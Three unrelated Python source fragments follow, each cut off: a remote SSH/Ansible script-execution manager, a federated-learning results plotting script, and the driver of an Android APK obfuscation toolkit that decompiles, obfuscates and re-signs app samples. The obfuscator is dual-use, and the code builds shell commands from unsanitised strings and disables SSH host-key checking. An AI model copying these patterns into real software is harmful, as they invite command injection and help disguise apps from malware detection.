self._script_report = script_report
@property
def script_report_id(self):
return self._script_report_id
@script_report_id.setter
def script_report_id(self, script_report_id: str):
self._script_report_id = script_report_id
@property
def script_realm(self):
return self._script_realm
@script_realm.setter
def script_realm(self, script_realm: str):
self._script_realm = script_realm
@property
def script_type(self):
return self._script_type
@script_type.setter
def script_type(self, script_type: str):
self._script_type = script_type
@property
def script_destination(self):
return self._script_destination
@script_destination.setter
def script_destination(self, script_destination):
self._script_destination = script_destination
@property
def script_locker(self):
return self._script_locker
@script_locker.setter
def script_locker(self, script_locker):
self._script_locker = script_locker
@property
def script_filename(self):
return self._script_filename
@script_filename.setter
def script_filename(self, script_filename):
self._script_filename = script_filename
@property
def script_content(self):
return self._script_content
@script_content.setter
def script_content(self, script_content):
self._script_content = script_content
@property
def execution_id(self):
return self._execution_id
@execution_id.setter
def execution_id(self, execution_id):
self._execution_id = execution_id
def __close_script_report(self):
"""
Thus function close an existing script report
"""
try:
print(" >>> Enter file:scenarioManager:class:scenarioManager:func:__close_script_report")
self.script_report["end_at"] = datetime.datetime.isoformat(datetime.datetime.utcnow())
self.script_report["status"] = "ended"
self.script_report["duration"]["end_at"] = datetime.datetime.now().timestamp()
self.script_report["duration"]["time"] = self.script_report["duration"]["end_at"] - self.script_report["duration"]["start_at"]
script_reporter = reporter.Reporter(self.ES, report_type="script")
resp = script_reporter.update(self.script_report_id, self.script_report)
return True if resp["result"] == "updated" else False
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:__close_script_report")
print(e)
return {"failure": str(e)}
def __update_script_report(self):
try:
print(self.script_report_id, self.script_report)
script_reporter = reporter.Reporter(self.ES, report_type="script")
resp = script_reporter.update(self.script_report_id, self.script_report)
return True if resp["result"] == "updated" else False
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:update_script_report")
print(e)
return {"failure": str(e)}
def __open_script_report(self):
"""
This function open a new script run report
"""
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:__open_script_report")
self.script_report = {
"report_type": "script",
"scenario_id": self.scenario_id,
"script_id": self.script_id,
"node_id": self.node_id,
"name": self.script_name,
"description": self.script_description,
"realm": self.script_realm,
"start_at": datetime.datetime.isoformat(datetime.datetime.utcnow()),
"status": "running",
"execution_id": self.execution_id,
"output": "",
"duration": {
"start_at": datetime.datetime.now().timestamp()
}
}
script_reporter = reporter.Reporter(self.ES, report_type="script")
resp = script_reporter.__add__(self.script_report)
print(resp)
if resp["result"] == "created":
self.script_report_id = resp["_id"]
return True
else:
return False
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:__open_script_report")
print(e)
return {"failure": str(e)}
def node_details(self, realm: str, node_id: list):
try:
nod = node.Node(self.ES)
return nod.list_by_ids(realm, node_id)
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:node_details")
print(e)
return {"failure": str(e)}
def script_details(self, realm: str, script_id: str):
try:
scr = script.Script(self.ES)
return scr.list_by_ids(realm, script_id.split(" "))["hits"]["hits"][0]
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:script_details")
print(e)
return {"failure": str(e)}
def ssh_connector(self, realm: str, node: str):
try:
print(" >>> Enter file:scenarioManager:class:scenarioManager:func:ssh_connector")
return SSH(node, **{"username": self.realm_settings["hits"]["hits"][0]["_source"]["ssh"]["username"],
"password": self.settings.list_ssh_password_by_realm(realm),
"certificate": self.realm_settings["hits"]["hits"][0]["_source"]["ssh"]["certificate"]})
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:ssh_connector")
print(e)
return {"failure": str(e)}
@staticmethod
def is_all_threads_alive(thread_list):
is_terminated = True
for th in thread_list:
if th.is_alive():
is_terminated = False
return is_terminated
def build_remote_env(self, node_name, script_content, script_destination):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:function:build_remote_env")
ssh = self.ssh_connector(self.script_realm, node_name)
ssh.open_ssh_connection()
ssh_command = 'mkdir -p `dirname ' + script_destination + '`'
ssh.ssh_client.exec_command(ssh_command)
ssh_command = '> ' + script_destination + ' ;'\
+ 'chmod 700 ' + script_destination + ' ;'\
+ 'cat <<\'EOF\' >' + script_destination + '\n'\
+ script_content + '\n'\
'EOF'
print(ssh_command)
ssh.ssh_client.exec_command(ssh_command)
ssh.close_ssh_connection()
return True
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:send_script_to_remote")
print(e)
return {"failure": str(e)}
def destroy_remote_env(self, node_name, script_destination):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:function:destroy_remote_env")
ssh = self.ssh_connector(self.script_realm, node_name)
ssh.open_ssh_connection()
ssh_command = 'rm -fr `dirname ' + script_destination + '`'
ssh.ssh_client.exec_command(ssh_command)
ssh.close_ssh_connection()
return True
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:destroy_remote_env")
print(e)
return {"failure": str(e)}
def exec_remote_script(self, node_name):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:function:exec_remote_script")
run_command = 'echo $$ > ' + self.script_locker + ' ; ' + self.script_destination + " " + self.script_args
print(run_command)
ssh = self.ssh_connector(self.script_realm, node_name)
ssh.open_ssh_connection()
transport = ssh.ssh_client.get_transport()
channel = transport.open_session()
channel.exec_command(run_command)
while True:
if channel.exit_status_ready():
channel.close()
transport.close()
ssh.close_ssh_connection()
break
else:
self.script_report["output"] = self.script_report["output"] + str(
channel.recv(8092).decode('UTF-8'))
print("update output of script", self.script_name, self.execution_id, self.script_report["output"])
self.__update_script_report()
time.sleep(0.5)
return True
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:exec_remote_script")
print(e)
return {"failure": str(e)}
@staticmethod
def script_session():
try:
""" this function returns a run playbook session """
# the run playbook session is a hash value from the run date and time
s = datetime.datetime.isoformat(datetime.datetime.now()).encode()
return hashlib.sha1(s).hexdigest()
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:script_session")
print(e)
return {"failure": str(e)}
def prepare_ansible_backend_env(self):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:prepare_ansible_backend_env")
self.ansible_session_dir = os.path.join(
self.realm_settings["hits"]["hits"][0]["_source"]["ansible"]["inventory"]["location"],
self.script_realm
)
os.makedirs(self.ansible_session_dir, exist_ok=True)
except Exception as err:
print("backend Exception, file:scriptManager:class:scriptManager:func:prepare_ansible_backend_env")
print(err)
return {"failure": str(err)}
def prepare_ansible_playbook(self):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:prepare_ansible_playbook")
self.ansible_playbook_file = os.path.join(
self.ansible_session_dir,
self.script_filename
)
with open(self.ansible_playbook_file, 'w+') as pbf:
pbf.write(self.script_content)
except Exception as err:
print("backend Exception, file:scriptManager:class:scriptManager:func:prepare_ansible_playbook")
print(err)
return {"failure": str(err)}
def make_ansible_inventory_data(self, node_name):
""" this function returns true if the inventory file is successfully created else false """
# this function write the ansible inventory for the ongoing session
# as defined in ansible recommendation. it writes ansible inventory group between [] with
# the session id name composed of nodes identities such as ip, fqdn or hostnames.
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:make_ansible_inventory_data")
with open(self.ansible_inventory_file, 'w') as inventory:
crypto = self.realm_settings["hits"]["hits"][0]["_source"]["crypto"]
ansible_user = self.realm_settings["hits"]["hits"][0]["_source"]["ansible"]["username"]
ansible_password = self.realm_settings["hits"]["hits"][0]["_source"]["ansible"]["password"]
ansible_certificate = self.realm_settings["hits"]["hits"][0]["_source"]["ansible"]["certificate"]
# write the inventory ansible group to tag with the session id
# to tag the nodes targeted by this session.
inventory.write('[' + self.ansible_session_id + ']\n')
# we have a list of node id we need to map the node id into network element
# reachable via network.
for hostname in node_name:
inventory.write(hostname + '\n')
inventory.write('\n')
inventory.write('[' + self.ansible_session_id + ':vars]\n')
inventory.write('ansible_ssh_common_args=\'-o StrictHostKeyChecking=no\'\n')
inventory.write('ansible_user=' + ansible_user + '\n')
if ansible_password != "":
inventory.write(
str('ansible_password=' + decrypt_password(crypto, ansible_password) + '\n'))
elif ansible_certificate != "":
inventory.write(str(' ansible_ssh_private_key_file=' + ansible_certificate + '\n'))
else:
pass
return True
except Exception as err:
print("backend Exception, file:scriptManager:class:scriptManager:func:make_ansible_inventory_data")
print(err)
return {"failure": str(err)}
def prepare_ansible_backend_inventory(self, node_name):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:prepare_ansible_backend_inventory")
""" this function returns true if the file is created else false """
self.ansible_inventory_file = os.path.join(self.ansible_session_dir, self.ansible_session_id)
os.mknod(self.ansible_inventory_file)
return True if self.make_ansible_inventory_data(node_name) else False
except Exception as err:
print("backend Exception, file:scriptManager:class:scriptManager:func:prepare_ansible_backend_inventory")
print(err)
return {"failure": str(err)}
def prepare_ansible_backend(self, node_name: list):
self.ansible_session_id = self.script_session()
self.prepare_ansible_backend_env()
self.prepare_ansible_playbook()
self.prepare_ansible_backend_inventory(node_name)
def run_ansible_script(self):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:function:run_ansible_script")
node_name = []
for node_data in self.node_details(self.script_realm, self.node_id)["hits"]["hits"]:
if node_data["_source"]["scan_by_ip"]:
node_name.append(node_data["_source"]["ip_reference"])
else:
node_name.append(node_data["_source"]["name"])
self.prepare_ansible_backend(node_name)
ansible_cmd = ["ansible-playbook", "-i", self.ansible_inventory_file, self.ansible_playbook_file]
with subprocess.Popen(ansible_cmd, stdout=subprocess.PIPE) as proc:
while proc.poll() is None:
self.script_report["output"] = self.script_report["output"] + str(proc.stdout.read().decode('UTF-8'))
self.__update_script_report()
time.sleep(0.5)
self.__close_script_report()
return True
except | |
# from tff import NUM_EPOCHS
from matplotlib import pyplot as plt
import json, ast
import math
import numpy as np
import pickle
import argparse
import pandas as pd
import seaborn as sns
import collections
import tensorflow_federated as tff
from tensorflow.python.framework.constant_op import constant
NUM_CLIENTS = [5,34,338,1692]
NUM_ROUNDS = 150
NUM_EPOCHS = 5
MODES = ['reduction_functions', 'femnist_distribution', 'uniform_vs_num_clients_weighting', 'accuracy_10percent_vs_50percent_clients_comparison', 'accuracy_5_34_338_comparison', 'reduction_functions_comparison','updates_comparison']
modes = ["constant","exponential","linear","sigmoid","reciprocal"]
num_rounds = np.arange(1,NUM_ROUNDS+1)
num_clients = str(NUM_CLIENTS[0])
# def movingaverage(interval, window_size):
# # window = np.ones(int(window_size))/float(window_size)
# # return np.convolve(interval, window, 'same')
# cumsum_vec = np.cumsum(np.insert(interval, 0, 0))
# ma_vec = (cumsum_vec[window_size:] - cumsum_vec[:-window_size]) / window_size
# return ma_vec
##############################################################################################################################################################
################################# Plot the graph of functions for different modes of reducing sampled clients ################################################
##############################################################################################################################################################
def reduction_functions():
#**********************plot constant function***********************#
x = np.arange(0,150,0.1)
y_constant = [338]*len(x)
plt.plot(x,y_constant,label="constant")
#**********************plot exponential function***********************#
y_exponential = [-np.exp((x_head-1)/10.3)+338 for x_head in x if x_head < 60] + [34]*(len(x)-600)
plt.plot(x,y_exponential,label="exponential reduction")
#**********************plot linear function***********************#
y_linear = [-5.065*x_head+338 for x_head in x if x_head < 60] + [34]*(len(x)-600)
plt.plot(x,y_linear,label="linear reduction")
#**********************plot sigmoid function***********************#
y_sigmoid = -304/(1+np.exp(-0.26*(x-20)))+338
plt.plot(x,y_sigmoid,label="sigmoid reduction")
#**********************plot reciprocal function***********************#
y_reciprocal = 50/x+34
plt.plot(x,y_reciprocal,label="reciprocal reduction")
plt.xlim(0,150)
plt.ylim(0,400)
plt.xlabel("Round")
plt.ylabel("Number of clients / Round")
plt.legend()
# plt.title("Reduction functions")
plt.show()
return
##############################################################################################################################################################
############################################## Plot the graph of functions for FEMNIST distribution ##########################################################
##############################################################################################################################################################
def femnist_distribution():
emnist_train, emnist_test = tff.simulation.datasets.emnist.load_data()
client_data_counted_list=[len(emnist_train.create_tf_dataset_for_client(emnist_train.client_ids[x])) for x in range(len(emnist_train.client_ids))] #a list of the number of data in each client correspond to its index
## A dictionary with unique elements from the sequence as keys and their frequencies (counts) as values, in this case key=data count of a client & value=number of clients who have the same data count
counted_client_data = collections.Counter(client_data_counted_list)
## Sort counted_client_data by keys in ascending order and store them in a list of tuples, where each tuple has a (key,value)
counted_client_data_sorted = sorted(counted_client_data.items())
# print(counted_client_data_sorted)
## Unzip
data_count_per_client,num_clients=zip(*counted_client_data_sorted) #zip(*) is the inverse of zip(), unpack the list of tuples(pairs) into two tuples, namely (keys) and (values)
#alternatively
# data_count_per_client,num_clients= dict(counted_client_data_sorted).keys(),dict(counted_client_data_sorted).values()
#-----------------Plot the bar plot of the distribution of clients data---------------------##
plt.rcParams.update({'figure.figsize':(10,6), 'figure.dpi':100})
fig, ax = plt.subplots()
ax.bar(data_count_per_client,num_clients)
ax.set_xlabel('Data amount per client(digits)')
ax.set_ylabel('Frequency(Number of clients)')
# ax.set_title('Data_Distribution_FEMNIST')
plt.show()
return
##############################################################################################################################################################
#################################################### Plot for different weightings strategies ################################################################
##############################################################################################################################################################
def uniform_vs_num_clients_weighting():
with open(f"metrics/num_examples_vs_uniform/{NUM_CLIENTS[1]}_clients_{NUM_ROUNDS}_rounds_{NUM_EPOCHS}_epochs_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
# plot global accuracy & loss for all training rounds
plt.plot(num_rounds, [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[1]} clients, weighted by NUM_EXAMPLES")
# num_rounds_av = movingaverage(num_rounds, 4)
# plt.plot(num_rounds_av, global_accuracy[:147])
with open(f"metrics/num_examples_vs_uniform/{NUM_CLIENTS[1]}_clients_uniform_weights_{NUM_ROUNDS}_rounds_{NUM_EPOCHS}_epochs_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(num_rounds, [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[1]} clients, weighted by UNIFORM")
plt.xlabel('Round',size=12)
plt.ylabel('Test accuracy (%)',size=12)
plt.legend()
plt.show()
##############################################################################################################################################################
########################################### Plot for the training accuracy of randomly selected 338&1692 clients #############################################
##############################################################################################################################################################
def accuracy_10percent_vs_50percent_clients_comparison():
for i, n in enumerate(NUM_CLIENTS[2:]):
with open(f"metrics/{n}_clients_{NUM_ROUNDS}_rounds_{NUM_EPOCHS}_epochs_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(num_rounds, [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{n} random clients")
plt.xlabel('Round',size=12)
plt.ylabel('Test accuracy (%)',size=12)
plt.legend()
plt.show()
##############################################################################################################################################################
########################################### Plot for the training accuracy of randomly selected 5&34&338 clients #############################################
##############################################################################################################################################################
def accuracy_5_34_338_comparison():
for n in range(len(NUM_CLIENTS[:-1])):
with open(f"metrics/{NUM_CLIENTS[n]}_clients_{NUM_ROUNDS}_rounds_{NUM_EPOCHS}_epochs_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(num_rounds, [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[n]} random clients")
plt.xlabel('Round',size=12)
plt.ylabel('Test accuracy (%)',size=12)
plt.legend()
plt.show()
#####################################################################################################################
################ Plot accuracy for various modes of varying num of randomly selected/sampled clients#################
#####################################################################################################################
def reduction_functions_comparison(mode):
for mode_index, mode in enumerate(mode):
if mode == "constant":
continue
else:
with open(f"metrics/vary_num_clients_and_rounds/{NUM_CLIENTS[-2]} -> {NUM_CLIENTS[-2]} clients_constant_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(np.arange(len(global_accuracy)), [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[-2]} clients, constant")
with open(f"metrics/vary_num_clients_and_rounds/{NUM_CLIENTS[-2]} -> {NUM_CLIENTS[1]} clients_{mode}_accuracy_global.txt","rb") as fp: #unpickling
global_accuracy = pickle.load(fp)
plt.plot(np.arange(len(global_accuracy)), [x*100 for x in global_accuracy[:NUM_ROUNDS]], label=f"{NUM_CLIENTS[-2]} -> {NUM_CLIENTS[1]} clients, {mode} reduction")
plt.xlabel('Round',size=12)
plt.ylabel('Test accuracy (%)',size=12)
plt.legend()
plt.show()
###############################################################################################################################
#### Plot the bar graph of model update percentage & training time of different modes & rounds of reducing sampled clients ####
###############################################################################################################################
def updates_comparison():
#*****************************************************************************************************************#
#**********************plot bar chart of pushed_model_updates in different modes**********************************#
#*****************************************************************************************************************#
with open(f"metrics/vary_num_clients_and_rounds/pushed_model_updates.json","r") as f:
pushed_model_updates = json.load(f)
modes = [mode for mode, _ in pushed_model_updates.items()]
updates = [update for _, update in pushed_model_updates.items()]
with open(f"metrics/vary_num_clients_and_rounds/modes_stopped_round.json","r") as f:
modes_stopped_round = json.load(f)
modes_stopped_round = [value for key,value in modes_stopped_round.items()]
data = {"modes": modes,
"updates": updates}
df = pd.DataFrame(data, columns=['modes', 'updates'])
# plt.figure(figsize=(5, 5),dpi=300)
plots = sns.barplot(x="modes", y="updates", data=df)
# Iterrating over the bars one-by-one
for bar in plots.patches:
# Using Matplotlib's annotate function and
# passing the coordinates where the annotation shall be done
plots.annotate(format(bar.get_height(), '.2f'), #two decimal for pushed_model_updates_percentage
(bar.get_x() + bar.get_width() / 2,
bar.get_height()), ha='center', va='center',
size=12, xytext=(0, 5),
textcoords='offset points')
# Setting the title for the graph
# plt.title("Model updates comparison")
# plt.ylabel("Total Updates",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
plt.ylabel("Total Updates (updates/round)",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
plt.xlabel("Reduction mode",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# Fianlly showing the plot
plt.show()
#*****************************************************************************************************************#
#**********************plot bar chart of averaged pushed_model_updates in different modes*************************#
#*****************************************************************************************************************#
# with open(f"metrics/vary_num_clients_and_rounds/pushed_model_updates.json","r") as f:
# pushed_model_updates = json.load(f)
# modes = [mode for mode, _ in pushed_model_updates.items()]
# updates = [update for _, update in pushed_model_updates.items()]
# with open(f"metrics/vary_num_clients_and_rounds/modes_stopped_round.json","r") as f:
# modes_stopped_round = json.load(f)
# modes_stopped_round = [value for key,value in modes_stopped_round.items()]
# average_updates = [update/stopped_round for update,stopped_round in zip(updates,modes_stopped_round)]
# data = {"modes": modes,
# "average_updates": average_updates}
# df = pd.DataFrame(data, columns=['modes', 'average_updates'])
# # plt.figure(figsize=(5, 5),dpi=300)
# plots = sns.barplot(x="modes", y="average_updates", data=df)
# # Iterrating over the bars one-by-one
# for bar in plots.patches:
# # Using Matplotlib's annotate function and
# # passing the coordinates where the annotation shall be done
# # plots.annotate(format(bar.get_height(), '.2f'), #two decimal for pushed_model_updates_percentage
# plots.annotate(format(int(bar.get_height())), #integer for pushed_model_updates_percentage
# (bar.get_x() + bar.get_width() / 2,
# bar.get_height()), ha='center', va='center',
# size=12, xytext=(0, 5),
# textcoords='offset points')
# # Setting the title for the graph
# # plt.title("Model updates comparison")
# # plt.ylabel("Total Updates",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# plt.ylabel("Average Updates (updates/round)",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# plt.xlabel("Reduction mode",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# # Fianlly showing the plot
# plt.show()
#*****************************************************************************************************************#
#**********************plot bar chart of pushed_model_updates_percentage in different modes***********************#
#*****************************************************************************************************************#
# with open(f"metrics/vary_num_clients/pushed_model_updates_percentage.txt","rb") as fp: #unpickling
# pushed_model_updates_percentage = pickle.load(fp)
# modes = [mode for mode, _ in pushed_model_updates_percentage.items()]
# update_percentages = [update_percentage for _, update_percentage in pushed_model_updates_percentage.items()]
# data = {"modes": modes,
# "update_percentages": update_percentages}
# df = pd.DataFrame(data, columns=['modes', 'update_percentages'])
# # plt.figure(figsize=(5, 5),dpi=300)
# plots = sns.barplot(x="modes", y="update_percentages", data=df)
# # Iterrating over the bars one-by-one
# for bar in plots.patches:
# # Using Matplotlib's annotate function and
# # passing the coordinates where the annotation shall be done
# plots.annotate(format(bar.get_height(), '.2f'),
# (bar.get_x() + bar.get_width() / 2,
# bar.get_height()), ha='center', va='center',
# size=12, xytext=(0, 5),
# textcoords='offset points')
# # Setting the title for the graph
# plt.title("Model updates comparison")
# plt.ylabel("Model updates(%)",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# plt.xlabel("Reduction mode",fontdict= { 'fontsize': 11, 'fontweight':'bold'})
# # Fianlly showing the plot
# plt.show()
# #****************************************************************************************************************#
# #**********************plot bar chart of training time in different modes - varied clients***********************#
# #****************************************************************************************************************#
# f = open(f"metrics/vary_num_clients/modes_training_time.json", 'r')
# modes_training_time = json.load(f)
# f.close()
# modes = [mode for mode, _ in modes_training_time.items()]
# training_times = [training_time for _, training_time in modes_training_time.items()]
# # plt.rcParams.update({'figure.figsize':(10,6), 'figure.dpi':300})
# fig, ax = plt.subplots()
# ax.bar(modes,training_times,color=['green', 'red', 'purple', 'blue', 'navy'])
# ax.set_xlabel('Reduction mode',fontweight="bold")
# ax.set_ylabel('Training time(s)',fontweight="bold")
# ax.set_title('Training time comparison')
# label = ["{:.2f}".format(t) for _,t in enumerate(training_times)]
# for rect, label in zip(ax.patches, label):
# height = rect.get_height()
# ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label,
# ha='center', va='bottom')
# plt.show()
#**************************************************************************************************************************#
#**********************plot bar chart of training time in different modes -varied clients and rounds***********************#
#**************************************************************************************************************************#
f = open(f"metrics/vary_num_clients_and_rounds/modes_training_time.json", 'r')
modes_training_time = json.load(f)
f.close()
modes = [mode for mode, _ in modes_training_time.items()]
training_times = [training_time for _, training_time in modes_training_time.items()]
# plt.rcParams.update({'figure.figsize':(10,6), 'figure.dpi':300})
fig, ax = plt.subplots()
ax.bar(modes,training_times,color=['green', 'red', 'purple', 'blue', 'navy'])
ax.set_xlabel('Reduction mode',fontweight="bold")
ax.set_ylabel('Training time(s)',fontweight="bold")
# ax.set_title('Training time comparison')
label = ["{:.2f}".format(t) for _,t in enumerate(training_times)]
for rect, label in zip(ax.patches, label):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label,
ha='center', va='bottom')
plt.show()
#******************************************************parsing the command line arguments********************************************************************#
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('mode', nargs=1, type=str, help='Running mode. Must be one of the following modes: {}'.format(MODES))
args = parser.parse_args()
mode = args.mode[0]
return args, mode
if __name__ == '__main__':
args, mode = parse_args() | |
<reponame>breakpad/aamo
#! /usr/bin/env python
import logging
import sys
import os
from datetime import datetime
import subprocess as sub
import util as u
import exception as e
import obfuscator_rebuild
import obfuscator_defunct
import obfuscator_renaming
import obfuscator_goto
import obfuscator_string
import obfuscator_indirections
import obfuscator_nop
import obfuscator_debug
import obfuscator_branch
import obfuscator_reordering
import obfuscator_reflection
import obfuscator_fields
import obfuscator_manifest
import obfuscator_resource
import obfuscator_raw
import obfuscator_restring
import obfuscator_asset
import obfuscator_intercept
import obfuscator_lib
base_dir = os.path.abspath(os.path.dirname(__file__))
obfuscator_resource_dir = base_dir + 'obfuscators'
obfuscator_log_file = base_dir + 'obfuscators.log'
debug = False
cleanup = True
enable_logging = True
def popen(com_str):
p = sub.Popen(com_str, shell=True, stdout=sub.PIPE, stderr=sub.PIPE)
out, err = p.communicate()
if enable_logging:
u.logger(out)
u.logger(err)
if 'Exception' in out or 'Exception' in err:
if 'method index is too large' in out or 'method index is too large' in err:
raise e.AndroidLimitException('Unable run :' + com_str)
elif 'java.lang.ArrayIndexOutOfBoundsException' in out or 'java.lang.ArrayIndexOutOfBoundsException' in err:
raise e.AndroidRandomException('Unable run :' + com_str)
else:
raise e.RunningObfuscatorException('Unable run :' + com_str)
def clean_temp(sample_tf_dir): # Clear the temporary support directory
try:
if enable_logging:
u.logger('Directory cleaned: ' + sample_tf_dir)
popen('rm -rf ' + sample_tf_dir + '/app')
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to clean ' + sample_tf_dir)
def backsmali(sample_tf_dir, sample_file_name): # Backsmali an apk file
try:
if enable_logging:
u.logger('Backsmali: ' + sample_file_name + ' into ' + sample_tf_dir)
popen('apktool d --force --no-debug-info ' + sample_file_name + ' ' + sample_tf_dir + '/app')
if os.path.isdir(u.base_dir()+'/smali/com'):
u.main_exec_dir = 'com'
elif os.path.isdir(u.base_dir()+'/smali/org'):
u.main_exec_dir = 'org'
else:
u.main_exec_dir = ''
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to backsmali ' + sample_file_name + ' into ' + sample_tf_dir)
def smali(sample_tf_dir, sample_file_name): # Smali an apk file
try:
if enable_logging:
u.logger('Smali: ' + sample_file_name + ' from ' + sample_tf_dir)
popen('apktool b --force-all ' + sample_tf_dir + '/app' + ' ' + sample_file_name)
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to smali ' + sample_file_name + ' from ' + sample_tf_dir)
def sign_apk(sample_file_name): # Sign an apk file with a SHA1 key
try:
if enable_logging:
u.logger('Sign: ' + sample_file_name)
popen('jarsigner -sigalg MD5withRSA -digestalg SHA1 -keystore ' + obfuscator_resource_dir + '/resignKey.keystore -storepass resignKey ' + sample_file_name + ' resignKey')
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to sign ' + sample_file_name)
def zip_align(sample_file_name): # Align the file
try:
if enable_logging:
u.logger('Zip: ' + sample_file_name)
popen('cp ' + sample_file_name + ' ' + sample_file_name + '_old.apk')
popen('zipalign -f 8 ' + sample_file_name + '_old.apk' + ' ' + sample_file_name)
popen('rm -f ' + sample_file_name + '_old.apk')
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to zipalign ' + sample_file_name)
def design_apk(sample_file_name): # Remove a signature from an apk file
try:
if enable_logging:
u.logger('DeSign: ' + sample_file_name)
popen('zip -d ' + sample_file_name + ' /META-INF/*') # Delete the META-INF folder from the apk root
except OSError as ex:
raise e.OpenToolException(str(ex) + '\nUnable to delete META-INF from ' + sample_file_name)
def init(sample_tf_dir): # Initialize the obfuscator routine
reload(sys)
sys.setdefaultencoding('utf-8')
u.obfuscator_dir = obfuscator_resource_dir
u.global_dir = sample_tf_dir + '/app'
logging.basicConfig(filename=obfuscator_log_file, level=logging.DEBUG)
if enable_logging:
u.logger('Obfuscators Initialize: ' + u.obfuscator_dir + ' ' + u.global_dir)
def apply_resign(sample_file_name): # Resign an apk file
try:
design_apk(sample_file_name)
sign_apk(sample_file_name)
except e.OpenToolException as ex:
raise e.RunningObfuscatorException(str(ex))
def apply_zip(sample_file_name): # Zipaling an apk file
try:
zip_align(sample_file_name)
except e.OpenToolException as ex:
raise e.RunningObfuscatorException(str(ex))
def apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscatorPy):
'''Apply an obfuscator'''
try:
if enable_logging:
u.logger('Python Obfuscator!')
#backsmali(sample_tf_dir, sample_file_name)
obfuscatorPy.obfuscate()
if debug:
smali(sample_tf_dir, sample_file_name)
#sign_apk(sample_file_name)
#clean_temp(sample_tf_dir)
except (e.OpenToolException, e.LoadFileException) as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable run python obfuscator')
def run_obfuscator_resigned(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Resign')
apply_resign(sample_file_name)
except e.OpenToolException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Resign')
def run_obfuscator_zip(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Align')
apply_zip(sample_file_name)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Align')
def run_obfuscator_rebuild(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Rebuild')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_rebuild)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Rebuild')
def run_obfuscator_defunct(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Defunct')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_defunct)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Defunct')
def run_obfuscator_renaming(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Renaming')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_renaming)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Renaming')
def run_obfuscator_goto(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Goto')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_goto)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Goto')
def run_obfuscator_string(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator String')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_string)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply String')
def run_obfuscator_indirections(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Indirections')
apply_py_obfuscator(sample_file_name, sample_tf_dir, obfuscator_indirections)
except e.RunningObfuscatorException as ex:
raise e.RunningObfuscatorException(str(ex) + '\nUnable to apply Indirections')
def run_obfuscator_nop(sample_file_name, sample_tf_dir):
try:
if enable_logging:
u.logger('Obfuscator Nop')
